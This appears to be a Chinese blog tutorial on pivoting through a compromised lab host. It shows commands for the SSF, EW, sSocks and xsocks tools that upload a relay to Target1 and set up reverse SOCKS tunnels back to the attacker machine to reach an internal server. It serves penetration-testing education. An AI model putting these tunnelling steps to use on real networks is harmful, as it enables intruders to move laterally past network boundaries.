内网通道构建——socks
内网通道构建——socks
- 1、 测试环境
- 2、 内网通道构建
- 2.1、SSF
- 2.2、EW
- 2.3、SSOCKS
- 2.4、XSOCKS
1、 测试环境
攻击机:192.168.11.137
Target1:192.168.11.151 192.168.21.101
Target2:192.168.21.102
假如拿到了Target1的shell,需通过Target1构建通道,访问Target2主机,在Target2中,配置有Apache服务,浏览器访问返回 Yeah,you can access it! 。
2、 内网通道构建
2.1、SSF
ssf是一款拥有多平台支持,且易于使用的网络工具,下载地址:https://securesocketfunneling.github.io/ssf/#download
下载后将压缩包内certs文件夹与ssfd.exe上传至Target1,在Target1中,使用下面命令建立通信端口
ssfd.exe -p [PORT]
在攻击机中运行下面命令,建立socks通信隧道
ssfd.exe -D [localport] -p [remoteport] [remoteip]
在浏览器中设置代理为代理,代理协议为socks4
设置好代理后,浏览器访问成功返回 Yeah,you can access it! 页面信息。
2.2、EW
下载地址:https://github.com/idlefire/ew
下载解压后,攻击机使用下面命令建立通信通道
ew_for_Win.exe -s rcsocks -l [proxyport] -e [remoteclientport]
将压缩包内ew_for_Win.exe上传至Target1,在Target1中,使用下面命令连接通信端口
ew_for_Win.exe -s rssocks -d [remoteip] -e [remoteport]
在浏览器中设置代理为代理,代理协议为socks5
设置好代理后,浏览器访问成功返回 Yeah,you can access it! 页面信息。
2.3、SSOCKS
SSOCKS属于反向代理,下载地址:https://github.com/54Pany/sSocks/releases
下载解压后,攻击机使用下面命令建立通信通道
rcsocks.exe -l [proxyport] -p [remoteclientport] -vv
将压缩包内rssocks.exe上传至Target1,在Target1中,使用下面命令连接通信端口
rssocks.exe -s [remoteip]:[remoteport] -vv
在浏览器中设置代理为代理,代理协议为socks5
设置好代理后,浏览器访问成功返回 Yeah,you can access it! 页面信息。
2.4、XSOCKS
下载地址:https://www.lanzous.com/i88ckyh
下载后,攻击机使用下面命令建立通信通道
xsocks.exe -t -p1 [remoteclientport] -p2 [proxyport]
将xsocks.exe上传至Target1,在Target1中,使用下面命令连接通信端口
xsocks.exe -r [remoteip]:[remoteport]
在浏览器中设置代理为代理,代理协议为socks5
设置好代理后,浏览器访问成功返回 Yeah,you can access it! 页面信息。
——舍心K
内网通道构建——socks相关推荐
- 内网安全:Socks 代理 || 本地代理 技术.
内网安全:Socks 代理 || 本地代理 技术. Socks 代理又称全能代理,就像有很多跳线的转接板,它只是简单地将一端的系统连接到另外一端.支持多种协议,包括http.ftp请求及其它类型的请求 ...
- Docker for windows 容器内网通过独立IP直接访问的方法
Docker for windows 容器内网通过独立IP直接访问的方法 Docker官方推荐我们通过端口映射的方式把Docker容器的服务提供给宿主机或者局域网其他容器使用.一般过程是: 1.Doc ...
- 内网通过映射后的公网IP访问内网服务测试--ASA8.0 hairpin NAT测试
一.测试拓扑: 参考链接:http://blog.csdn.net/boblxs/article/details/8063814 二.基本思路: A.通过配置hairpin NAT使得内网通过映射后的 ...
- NAT ALG DNS — DNS在外部,内网通过域名访问内部服务器
NAT ALG DNS-DNS在外部,内网通过域名访问内部服务器 应用场景: R2.R3.R4为企业内部,DNS部署在公网,R2上设置NAT是的R1能够telnet到R4. 如在R2上启用NAT AL ...
- 内网通讯工具都有哪些?
互联网的迅速发展使得通讯工具在人们的日常生活与工作当中变得越来越普及.现在大多数企业内有使用Saas部署的通讯工具,但随着企业的发展,对信息安全的重视性越来越高,不少企业开始转用内网环境办公,与此同时 ...
- Ubuntu18.04下用信使与Windows下用内网通互传文件
1.前言 前段时间把自己的笔记本装了Ubuntu18.04.因为是五年前的笔记本了,配置有点跟不上了,之前一直用的win10,后来想反正这个旧本本没啥用了,索性在折腾折腾,装个Linux系统玩玩,于是 ...
- 在局域网中禁止内网通软件通信,该怎样操作?
如果您想禁止在局域网中的内网通软件进行通信,您可以采取以下措施: 防火墙设置:在局域网的防火墙中拒绝内网通软件的网络请求. 网络策略:使用网络策略控制对内网通软件的访问. 内容过滤:使用内容过滤器来拦 ...
- 梅林固件路由器修改hosts实现内网通过域名访问群晖dsm
梅林固件路由器修改hosts实现内网通过域名访问群晖dsm 前言 正文 结语 声明 创作立场声明:本文只是单纯的经验分享,没有任何恰饭行为!转载前请联系作者授权,并附上此文章链接! 前言 最近买了一台 ...
- 腾讯云(跨用户)跨区域内网通信配置
腾讯云(跨用户)跨区域内网通信配置 最近想在腾讯云上部署k8s,因为内网ip不通的问题搞了很久.最近终于找到了解决方案,成功实现跨区域内网通信! 下面记录下我是怎么进行配置的 1. 使用云联网 通过使 ...
- 内网通 去广告_新高一攻略|让我们一起跟升学e网通名师看看如何学好高中化学...
我们为什么要学习新高一化学?新高一化学与初中和高中化学有何不同?如何才能学好高中化学?有哪些方法和策略?这个暑假我们应该做什么? [新高一攻略]化学篇,一起来听升学e网通化学学科负责人睢金环老师是怎么 ...
最新文章
- DataCleaner 3.1.1 发布,数据质量分析管理
- java书籍_Java程序员必看的 13 本 Java 书籍!
- fastcopy比正常复制快多少_高中三年,每个阶段考多少分才正常?快对比一下
- 选择用户-显示已选用户
- 一套代码在不同的电脑执行快慢_设计师需要的电脑配置
- 云计算的概念、发展历史、痛点、以及未来展望
- MATLAB三阶导怎么输入,三阶样条插值(一阶导数边界条件) matlab程序
- 将xml文件由格式化变为压缩字符串
- [猎豹网校]数据结构与算法_C#语言
- 微服务超 10 万、跨语言场景,字节服务网格依靠 CloudWeGo 扛住流量洪峰
- AC 自动机算法 JAVA代码 实现
- 彻底删除手机系统软件
- 所谓语音合成 是计算机根据语言学,计算机语音合成在GAI中的应用
- 高端时尚简历PPT模板-优页文档
- MATLAB绘制海面风场图像(海面风场反演)
- python 微信撤回消息
- vivado仿真出错
- 目标竞赛省队,寒假如何备考生物竞赛联赛?
- 在图像中找任意曲线记录
- 谷歌浏览器 chrome network 没有显示url请求 问题